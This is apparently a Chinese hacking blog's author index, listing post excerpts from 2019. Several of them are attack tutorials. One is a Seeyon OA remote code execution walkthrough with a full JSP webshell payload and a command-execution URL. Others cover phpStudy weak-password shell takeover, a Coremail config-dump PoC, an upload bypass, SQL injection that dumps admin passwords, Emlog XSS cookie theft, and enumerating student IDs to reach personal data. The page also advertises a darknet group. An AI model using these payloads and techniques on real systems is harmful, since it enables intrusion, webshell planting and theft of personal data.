网站首页 关于作者 A.毒蜂 的所有文章

  • 利用PHPstudy探针弱口令漏洞批量拿shell

    关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和 general log file 你可以用 CTRL+F 需要把general log 改成ON 把 general log file修改成绝对路径的地址。C:/phpStudy/WWW/.xxx.php >>>这个xxx.php是你一句话的地址 如图。 修改好后。我们需要把这个命令插入到我们指定的php文件里 如图。 ...

    2019-06-30 2574
  • 关于coremail的0day附带poc

    import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/coremail” in r.text): print “mailsms is vulnerable: {0}”.format(url) else: print “mailsms is safe!” if __name__ == ‘__main__’: try: mailsmsPoC(sys.argv[1]) except: print “usage: python poc.py http://hi-ourlife.com/” 修改url即可用 ...

    2019-06-30 1108
  • Python爬虫之-爬取妹子图片

    #coding=utf-8 import requests from bs4 import BeautifulSoup import os all_url = ‘http://www.mzitu.com’ #http请求头 Hostreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://www.mzitu.com’ } Picreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://i.meizitu.net’ } #此请求头破解盗链 start_html = requests.get(all_url,headers = Hostreferer) #保存地址 path = ‘G:\python\妹子\liang’ #找寻最大页数 soup = BeautifulSoup(start_html.text,”html.parser”) page = soup.find_all(‘a’,class_=’page-numbers’) max_page = page[-2].text same_url = ‘http://www.mzitu.com/page/’ for n in range(1,int(max_page)+1): ul = same_url+str(n) start_html = requests.get(ul, headers = Hostreferer) soup = BeautifulSoup(start_html.text,”html.parser”) all_a = soup.find(‘div’,class_=’postlist’).find_all(‘a’,target=’_blank’) for a in all_a: title = a.get_text() #提取文本 if(title != ”): print(“准备扒取:”+title) #win不能创建带?的目录 if(os.path.exists(path+title.strip().replace(‘?’,”))): #print(‘目录已存在’) flag=1 else: os.makedirs(path+title.strip().replace(‘?’,”)) flag=0 os.chdir(path + title.strip().replace(‘?’,”)) href = a[‘href’] html = requests.get(href,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_max = mess.find_all(‘span’) pic_max = pic_max[10].text #最大页数 if(flag == 1 and len(os.listdir(path+title.strip().replace(‘?’,”))) >= int(pic_max)): print(‘已经保存完毕,跳过’) continue for num in range(1,int(pic_max)+1): pic = href+’/’+str(num) html = requests.get(pic,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_url = mess.find(‘img’,alt = title) print(pic_url[‘src’]) #exit(0) html = requests.get(pic_url[‘src’],headers = Picreferer) file_name = pic_url[‘src’].split(r’/’)[-1] f = open(file_name,’wb’) f.write(html.content) f.close() print(‘完成’) print(‘第’,n,’页完成’) ...

    2019-06-30 1300
  • 武汉某大学-学生信息泄露

    也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是123456 或者是别的试一试吧 运气不错进来了。那么就看看有没有别的信息了 我在学籍卡片处看到往下滑的时候看到了身份证号!!! 这已经涉及到信息泄露了。 接下来,我们在试试别的学号看能否进。 以此学号 推断一下 学号:1113033 7位数 试试1113034 能否进去 依旧可以用进 推断密码默认学号。学号是用递进的方式形成的, 我们看到了图上所示 院系:智能制造工程系 专业:包装技术与设计 学制:3.0 班级:11级包装技术与设计1班 我们看到了这些 再看学号(学号是1113034) 注意到什么没 11级 一班正好对应学号前面的111 那么把111修改成 1513001试试看呢。 成功 密码依旧是学号,那么就可以以此类推,但是我在这次进15级的这个学生我发现了,地址也有了, 就到这了吧。 此学校泄露信息。有姓名,身份证,地址。证件照。 ...

    2019-06-30 726
  • 微博|肉感评选/柔软36C胸部

    一个是“梁茶叔”带头举办的年度肉感评选,不只有瘦人身材才好,稍微胖一点前凸后翘体验更佳。 这些女人又给看胸又给看屁股的,知道你们很胖了还不行么。 另一个是“热带汽水”的网友,感到很沮丧,想要触摸一些36C柔软的东西,好心的网友给他准备了不少照片。 地址1:http://uee.me/aW4mq 地址2:http://uee.me/aW4mc ...

    2019-06-29 883
  • 暗网流出的诡异图片!千万别被骗了...

    暗网对于一般人来说比较神秘,因为它无法通过正常渠道进入,所以有些人会利用这一特点在网上编造图文故事,比如下面这三张被誉为从暗网流出的图片...... 长颈黑色不明生物 传闻:只要进过暗网的朋友一定看过这张照片,据说,有人在拍摄这个黑人男子时,他的背后突然出现了一个黑色长颈不明生物。 有人说这是一个长颈的外星人,也有人认为是召唤出来的恶魔,亦有人说那是一个木雕,直到现在也没有人知道这是什么生物...... 真相:其实这张照片根本不是从暗网流出的,而所谓的黑色不明生物,的确没有人知道是什么,因为这个生物根本就不存在...... 这张图其实是PS过的,据调查最早于2008年的匿名讨论区4chan中出现,未PS之前,那只是一个穿着白色短裤的半赤裸黑人小孩。 1.这张照片据说是“道西战争”中的大灰人。 真相:话说外星人都不穿衣服的吗? 这张照片展示的其实是位于塞尔维亚的名为BlackĆuprija的纪念碑,其修建于1962年。为了纪念在诺维萨德事件中的死难者。 1942年1月,匈牙利法西斯政府对南斯拉夫诺维萨德市等地抓捕游击队员。并以此为名逮捕监禁了大量的塞尔维亚人和犹太人,并对当地的平民进行了屠杀,共造成了约三千多人死亡。 这被认为是2010年俄罗斯地铁爆炸案的照片,照片中的女人身份未知 真相 :战斗民族的姑娘都这么凶悍吗? 这只是2013年的一部俄罗斯电影《地铁》的现场照 这部电影改编自同名小说。讲述的是由于管道泄漏引发的灾难,一行人在莫斯科的地铁中艰难求生的故事,和地铁爆炸案没有关系。 拍摄于同一地点的照片 相传图片中的人头是母亲来的,而在她的尸首左右两边的是她的儿女 这张“照片”收录于作者的系列作品“Haunted Memories”之中。 其他作品 ps 事实上,欧洲确实以前有一种特殊的的拍照方式,效果和上图类似。 5.这是真实中东暗杀现场的照片,极具历史价值< 真相 才怪 这张照片其实是1913年的悬疑电影fantômas :in the shadow of the guillotine的剧照而已。 这张照片据说在格鲁吉亚的一个餐馆的垃圾桶里发现,常用作“兔人”的都市传说的配图。 真相:摄影师Eliot Lee Hazel的系列摄影作品Poppy Filled Gang中的一张照片 真相:注意到右边的照相机镜头了吗? 这是中国现代艺术家朱冥在北京市中山公园进行“实验艺术”创作《1999年5月8日A号》时拍摄的照片。 暗网交流群,群文件会持续更新TOR相关东西、暗网网址等。。。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2019-06-29 11302
  • SWAPIDC答题答案

    注意答案排序可能不一样 第一题 第二题 第三题 第四题 ...

    2019-06-28 2600
  • 致远OA系统远程命令代码执行漏洞

    1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmlofficeservlet 如果出现了 DBSTEP V3.0 0 21 0 htmoffice operate err 哪就证明可能漏洞是存在的 3. 然后我们打开burp,需要POST一个shell上去.如何抓包就不说了。 然后点Go 4. 然后复制下面的jsp木马到POST包里面如图 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(" “+excuteCmd(request.getParameter(“cmd”)) + “ “);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce 5. 上面成功插入了jsp一句话木马接下来如下。 默认文件名是:test123456 然后访问网站 http://127.0.0.1:8088/seeyon/test.jsp 6. 然后运行以下代码 /seeyon/test.jsp?pwd=asasd3344&cmd=whoami 完整如这>>> http://127.0.0.1:8088/seeyon/test.jsp?pwd=asasd3344&amp;cmd=whoami 运行成功 administrator权限能干什么就不用多说了吧 请勿进行违法操作 ...

    2019-06-27 6245
  • 一次实战拿shell上传绕过

    一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库泄露问题 445是曾经暴出”永恒之蓝”病毒的端口 五、后台 后台系统及型号 六、编辑器 抓包获取编辑器地址,并且发现是dede下的编辑器,估计模板也是dede二次加工的了。 七、拿shell(仅列举一种方法-上传绕过) 直接上传一句话木马(php后缀),提示文件类型不正确 将一句话木马后缀修改为jpg格式,继续上传 。 上传成功。打开burpsuite,重新上传jpg后缀的一句话木马 。 将yjh.jpg修改为yjh.php[空格]。一定要在修改完的php后缀后面加上一个空格。如下图 然后点击action里面的send to repeater 。 打开repeater下的Hex,查找到yjh.php文件,修改对应行Hex值,由20改为00 。 即可发现原来的空格已经没有了 。 然后点击Go,放包。 链接访问成功,然后拿出中国菜刀,连接shell。 ...

    2019-06-27 878
  • C语言-扬帆起航

    用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), c); //更改文字颜色 return 0; } int main() { color(13); printf(" \n"); printf(" | | | \n"); printf(" )_) )_) )_) \n"); printf(" )___))___))___)╲_ \n"); printf(" )____)____)_____)╲╲_ \n"); printf(" H ____E___|__L__|__L__|__O__╲╲╲__________ \n"); printf(" ---------╲_____偏锋表哥_____扬帆起航_____________╱--------- \n"); printf(" ^^^^^ ^^^^^ ^^^^ ^^^^^^^ ^^^^^ ^^^ \n"); printf(" \n"); return 0; } 效果图 ...

    2019-06-26 615
  • SQL注入语法

    1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order by 字段数 例如: http://127.0.0.1/?id=index.asp? order by 11 http://127.0.0.1/?id=index.asp? order by 12 order by 11页面显示正常 order by 12 页面报错所以字段为11 3.暴露管理员用户、密码: http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin 1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3 2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码 http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin 3、到此,即可知道管理员用户名:admin和密码:123456 >>>比较老的一种sql注入.大佬勿喷...

    2019-06-26 776
  • 中国拟立密码法明确任何组织或个人不得窃取他人加密信息

    8密码法草案25日提请十三届全国人大常委会初次审议。草案明确,任何组织或者个人不得窃取他人的加密信息,不得非法侵入他人的密码保障系统,不得利用密码从事危害国家安全、社会公共利益、他人合法权益的活动或者其他违法犯罪活动。 你的密码安全吗?毒蜂教你密码设置,速收学习!123456、888888、5201314……这些数字你熟悉吗?如何设置一个安全性足够高的密码? 教你设置一个完美密码 1.谐音混合法 可以利用数字的谐音或相似的字符来设计密码。例如生日为“19950824则可以设置为“199MO82s 2.造句法 使用一句容易记住的句子。例如“吃葡萄不吐葡萄皮则可以设置为“ cptbtptp 教你设置一个完美密码 3.6步密码设置法 第一步:密码不要过短,最好大于8位数 第二步:使用一句话的缩写作为基础密码 例如“ just for you”的缩写是“jfy" 第三步:加上数字可使旱础密码更复杂 密码增强为“2018jfy" 第四步:加上符号可进行强化 密码增强为“2018jfy?" 第五步:使用大小写进一步强化 密妈增强为“2018y" 第六步:创建一个规则,在不同的网站使用不同的密码 例如:新浪微博+密码则为“XWB2018jfy?" 密码便用小贴士 1.不要一码多用 一个密码打天下”危验系数最高。黑客也会利用用户码走天下”的习惯,从攻击脆弱的小网站入手,最终获取用户的登录密码。 2.密码12位最合适 密码长固然安全性会提高,但不易记住。综合考虑安全、方便等因素,12位密码较为适当。 3.重要密码要定期更换 黑客一般通过反复尝试普遍性的密码:便可轻松掌握多个账户。所以,車要的密码要养成经常更新的习惯. 4.注意公共设备登录 在公共区域使用电子设备进行账户登录时,不要点击保存密码的功能选项。 5.采用多方验证 在设置账户时,可采用多方验证的方式,如手机验证码验证、回答问题验证等。同时在手机、电脑等电子设备中一定要安装防护软件。 6.重要账号单独设置 网上银行、网上支付、聊天账号等重要账号单独设置密码,并定期修改密码,可有效避免网站数据库泄露影响到自身账号。 必须注意日个手机支付坏习惯 不设手机屏保密码 不少人为了图省事,干脆不设手机密保,这样亳无隐私。跳过软件直接通过手机浏览器购物在浏览器购物容易出现钓鱼网站,再加上支付过程的极度简化,容易对消费者的财产造成威助。 不加辨别蹭免费网络 公共WF常被不法分子移槽木马及钓鱼网站,不但安全隐患多,而且分分钟盗窃你的个人信息。 蓝牙保持开启状态 智能手机可以通过蓝牙传播病毒,别人通过蓝牙间谍软件也可以查看你的电话本、信息、文件,修改你的音量,替你发号等。 5.淘汰手机时不彻底删除私人信息旧机不处理就出售,里面的个人信息会被拿到你手机的人知晓。 6.下载山塞软件下载应用软件要选择大型的应用商店下载,避免出现木马病毒。 7.随意点击手机短信链接活动获奖、邀请你查看相册、提示你密码出现问题等等的链接,还是不要随意去点击,应先想办法核实直实性。 8.见二维码就扫 二维码的背后可能会隐藏病毒、木马,你手机里的个人信息可就很轻易地被别人盗取了 密码法草案25日提请十三届全国人大常委会初次审议。草案明确,任何组织或者个人不得窃取他人加密信息,不得非法侵入他人密码保障系统,不得利用密码从事危害国家安全、社会公共利益、他人合法权益的活动或其他违法犯罪活动 你能用大脑记住的密码,都是不靠谱的密码 但是,在2019年,想要保护好自己的密码,应该怎么做? 牢记一点:任何一个你正在使用的网站或app都应该有一个单独的密码。这里就需要密码管理器了。某种程度上来讲,他们与很多家庭在90年代摆在电脑旁边记密码用的小本子差不多。 然而与密码本不一样,这些工具更加的安全,由一个只有你知道的“主密码”锁定,使这个数字保险箱里的内容只有你能够访问。当你注册一个新的网站时,你照常输入所有信息。当你到了输入密码的步骤时,不要输入你惯常使用的密码,点击浏览器上的密码管理器图标,解锁它,然后会生成一个新的随机的密码。这些密码会比你自己能记得住的更长更复杂——而且他们会被储存起来方便日后使用。 ...

    2019-06-26 668
  • 简单一招查出有没有人在你电脑里面“偷”资料

    简单一招查出有没有人在你电脑里面“偷”资料 1.左下角 找到“运行” 2. 在运行里面输入 regedit 3.然后按下面的目录 依次打开 HKEY_LOCAL_MACHINE/SYSTEM/CurrentContorSet/Enum/USBSTOR/ Disk&Ven_SanDisk&Prod_Ultra_USB_3.0&Rev_1.00 这个就是使用过的U盘目录 我的电脑是这个 4.我电脑上用过的U盘太多 我就随便选择一个 右边这里就是 使用过的痕迹  5. 这里 右键点击权限 6.打开后 就是这个界面 然后我们把 拒绝下面的选项 全部 √ 上 这样就可以 禁止 这个U 盘 在我们的电脑上“读写”了 (每个U盘的ID都是唯一的) ...

    2019-06-26 780
  • 解决Win7系统开机显示one or more table pointers are invalid

    WIN7电脑系统 一开机就显示:fatal error: one or more table pointers are invalid modification could be unsafe 按回车可进入系统 (这种情况很多时候是发生在装有固态硬盘的电脑上) 解决方法  先进入系统 点击左下角开始  开始  --运行--   cmd  (以管理员身份运行) 输入slmgr -upk  (卸载秘钥) 回车 稍等一会  就会出现卸载成功的界面 然后重启一遍    再用别的激活工具激活一下系统  再重启 ,就不会显示one or more table pointers are invalid。 ...

    2019-06-26 3245
  • CVE-2019-0708漏洞检测工具

    CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。   GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708 MSF模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 演示环境:Kali、Windows Server 2008 R2 64位。 Windows服务器需要开启远程桌面服务。   使用方法: 第1步:下载auxiliary模块 从GitHub下载cve_2019_0708_bluekeep.rb文件,把该文件放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下。 第2步:启动MSF 第3步:使用cve_2019_0708_bluekeep检测模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 第4步:设置目标计算机IP set RHOSTS 192.168.56.133 第5步:开始检测 exploit 如下图红框显示,目标计算机存在CVE-2019-0708漏洞。 ...

    2019-06-11 1342
  • 苍井空直播产子

    从苍井空Twitter.上同步的消息。       去年嫁给DJ后,传出身怀双胞胎的新闻,时间过得很快,马上就10个月了       他们决定在4月20日左右进行剖腹产,并在网络上直播生产过程共同见证这 神圣的一刻。在4月30日晚10点(日本时间)于视频平台       Abema.tv直播,并同步在中国、韩国、马来西亚等地同步播出。       新闻地址: http://t.cn/EXzAddA       直播地址: http://t.cn/E6ko2oG (中文同步翻译)...

    2019-04-21 1447
  • 黑客使用的最可怕攻击手段有哪些?

            黑客使用的攻击手段是多种多样的,那么他们使用的最可怕攻击手段有哪些呢?想要知道就认真阅读下文吧!    业内相关专家介绍,黑客使用的最可怕攻击手段往往有这些:    手段一:直接攻击Web应用程序。大家知道很多时候当涉及到相关保护敏感客户数据和相关财务记录时候,Web的应用程序安全配置文件就显得非常重要;也正是如此,Web应用程序就是黑客们的恶意攻击目标,他们会试图通过利用软件中的漏洞来达到破坏Web的目的;甚至多数黑客也会针对Web应用程序攻击利用众所周知的漏洞,毕竟这些漏洞在经过了久经考验防御措施后,黑客们就能非常容易通过Web应用程序漏洞来进行提权;作为专业防御人员而言,想要进行避免就应具备有攻防能力专业知识,这对正确保护Web应用程序是十分重要的。相关阅读—高手都是用什么操作系统?    手段二:采用社会工程的攻击手段。在社会工程信息系统中的安全防御往往就要能侧重于技术控制,也就是在物理设备和软件中需要实施安全,而黑客针对这些就会采用社会工程的攻击手段;在整个攻击中广大攻击者就会利用相关人性中的弱点,并能强迫人们采取行动来给广大攻击者们带来好处;再加上黑客在进行社会工程攻击时还会直接绕过安全技术控制,那么所带来的攻击后果是非常严重的。    手段三:SQL渗透检测注入法。这种注入法攻击手段是网站连接到数据库以来就产生的,采用这种黑客攻击手段往往能够带来非常可怕的后果;在整个攻击中,攻击者很容易对攻击目标的系统运行情况进行控制,还能任意进行查询被攻击者运行系统的相关数据,并能修改和在某些情况下直接导致对整个系统的损害,当前这种注入攻击就成为了网络攻击中的头号攻击手段。    在整个攻击中大家也很容易发现,在攻击控制中目标很容易被利用,且还能带来非常严重的攻击效果;再加上当前注入攻击依然是网络上比较猖獗的事件,因此就让这种攻击手段变得更加越发神秘,如何渗透一个网站;对于这些相关安全研究人员也表示,web技术人员就需能够学会了解攻击者们使用的SQL语法和基本注入攻击,甚至还需要能懂数据库发现和数据泄漏的先进概念,最好能够掌握住一些注入网络侦查和运行系统命令,以能达到有效防范这种攻击的目的。...

    2019-04-21 636
  • 关于计算机运行的那些事

          今天为大家带来的是一篇如何合理的使用计算机的技术性文章,我相信很多使用计算机的小白在看完这篇文章后,一定会知道更多的关于计算机的使用方法。在日常的生活工作中,我们总是离不开计算机,对计算机的合理使用有助于我们提升工作效率,同时也有助于我们对计算机的管理。下面我从几个方面来讲述一下怎么来合理的使用。 一、关于系统安装或重装       计算机系统在安装或是完全彻底重装前,都会对硬盘进行分区,硬盘分区时应当注意每个分区的存储量,特别是系统盘(C盘)的容量,避免后期因系统盘存储不够而耗费大量的时间来重装系统。列如:128G+1T的存储(128G固态硬盘+1T机械硬盘)如何来分区呢?建议进行如下分区:128G直接分成一个区,只用于存储系统文件和一些必要性的驱动程序文件即可!1T的存储建议分成四个分区,一个用来存储后续的软件,一个当做备份分区,一个用于存储电影、照片类的生活文件,最后一个用于存储专业知识或是工作涉及的文件。当然,你也可以直接将1T的存储划分为三个分区。 注:非系统盘一般格式化时选择NTFS类型。 二、驱动程序安装       重装系统时,当发现计算机的组合建失效时,多数由于缺少了所需驱动程序,只需去官网下载安装即可使用。那么,如何选用当前系统型号的驱动程序呢?win+R运行cmd,输入dxdiag,稍等两秒左右你就会看到你的计算机当前的系统型号,之后访问官网选择驱动程序下载,输入自己的系统型号,官网就会列出当前的系统都有哪些驱动程序文件,建议全部下载安装。安装完成后,系统会要求重启系统以便完成系统的更改,这时,只需重启即可使用。 注:推举安装驱动精灵,扫描当前系统,这时候驱动精灵会列出你的驱动程序有哪些需要升级有哪些没有安装的。一键升级即可,简单、方便、实用。 三、软件安装       非系统必要性的软件下载的时候,多数都会有自定义的安装方式,这时候请前往你留出的分区里新建一个文件夹,合理命名,之后返回软件安装界面,选择你要安装的位置,选你刚建好的文件安装即可。这么做的好处有哪些呢?软件安装位置清楚,避免根目录出现更多的文件,点开时,一脸懵逼,自己都不知道是做什么用的。其次,美观啊! 四、生活类文件与工作类文件       这两种文件单独存放在两个硬盘分区中,到时候找的时候也好找呢。除此之外,在保存文件时,要看清自己的文件存放的位置,避免保存后花费更多的时间来寻找保存的文件。 五、系统维护       计算机在使用时,会产生很多的垃圾,要每隔一段时间进行清理(三天或七天),同时,系统也会出现很多的漏洞,安装合适的防护软件是及其重要的。推举:360软件、电脑管家.......在众多的防护软件中选一款自己喜欢的就好。       总结:系统的首次安装要注意合理分区。后续的重装请装上当前系统型号的所有驱动程序。文件的保存及其命名时不要粗心大意,对各分区应当合理划分使用,以保证系统的长时间运行。 ...

    2019-04-21 579
  • [技术教程]Emlog程序储存型XSS漏洞测试

    通过Emlog程序后台编辑器反射XSS漏洞 拿下一个博客站后台并挂黑页~ 这个漏洞呢 我很早之前就发现了 一直都没时间做这期文章 太多事情了 做一件事又忘了一件事 很难受 目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! 教程开始 首先 检查一下有没有开放注册 如果开放注册的话 就先注册一个账号 注册完成之后在网址后面输入admin 进入到后台 投一篇文章 代码里面插入xss代码 例如这样 接下来就等管理员审核了 审核之后就去xss平台查看反射回来的cookie了 这里我之前获取过一次了 我就不演示了 获取到之后 去上传一个插件 插件文件夹里面必须带一个大马或者小马文件 上传完成之后直接访问/content/plugins/插件名字/你的大马/小马文件 然后就可以上传黑页了 ...

    2019-04-21 1675
  • 一条个人信息8毛钱 警方通报300万条信息泄露大案

    去年4月初,相城公安分局漕湖派出所警方接到市民茅先生举报,称他的个人信息被泄露。随后警方对此展开侦查,竟牵出一个特大个人信息泄露案。 茅先生说,2017年9月底他在微信上购买了一次保健品,同时给了店家自己的姓名、手机号和收货地址。可没想到后面发生的事让他烦恼不已。不分时段、连续不断的骚扰电话让茅先生的生活受到影响,于是他选择了报警。 相城公安分局漕湖派出所经过侦查,确认茅先生信息遭泄露。随后侦查员会同苏州市公安局网监支队、相城公安分局网监大队在杭州市萧山公安的协助下,于去年4月中旬将隐匿在杭州市萧山区宁围镇振宁路的刘某等嫌疑人当场抓捕归案。经过多次对刘某的审讯,他交代了其通过QQ、微信等网络聊天平台向他人购买50余万条公民个人信息后,进行销售,获利人民币2万多元。 顺藤摸瓜,相城公安9个派出所分赴安徽、南京、湖北等地区,抓获嫌疑人20多名。其中,黄埭派出所民警在湖北省汉川市将主要犯罪嫌疑人何某抓获。民警当场查获手机两部、笔记本电脑两台、u盘三个以及两张身份证、两张银行卡。民警在查获的u盘里发现了300余万条个人信息数据。 随着刘某、何某的到案,一条贩卖公民个人信息的地下交易链逐渐显现。何某是湖北汉川的一家纺织厂的操作工,本可以安守本分老老实实过日子,但就因为一次夜宵改变了命运的轨迹。一天晚上,何某在吃夜宵时,无意中听到旁边桌的人说贩卖个人信息可以赚钱。何某动起了脑筋,也想尝试赚些快钱,于是他四处打定贩卖个人信息的方法。 按照别人传授的"经验",何某搜索关键词进入到一些qq群中。这些qq群仿佛一个巨大的"信息黑市",在这里可以随意买卖个人信息。群里铺天盖地的信息让刚加入qq群的何某吃了一惊。在群里寻找需要求购信息的客户,加他们私聊,再通过其他qq群寻找卖家进行交易。何某不止通过qq群贩卖个人信息,其他渠道获得的信息,他一概照单全收。 在一次饭局,何某认识了谢某,谢某给了何某一个u盘,说里面有很多"资料"。何某坦言,所谓的"资料"也就是个人信息。回到家中,何某在u盘中看到了大量个人信息数据,涉及数据老年保健数据、男性壮阳数据、快递数据、淘宝数据等。之后,何某在qq群中寻找有这些信息需求的目标客户,变卖数据。目前,等待何某他们的将是法律的制裁。 警方提示:大家应提高个人信息保护意识。注册账户时,"节约"使用个人信息,如必须填写个人信息,尽可能少提供个人信息。在一些平台注册时要多留心眼,谨慎注册,不随意连接陌生wifi,对个人信息保护引起足够重视。对企业来说,要加强企业内部监管,提升员工保密意识,严格企业保密制度。 ...

    2019-03-01 1177

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注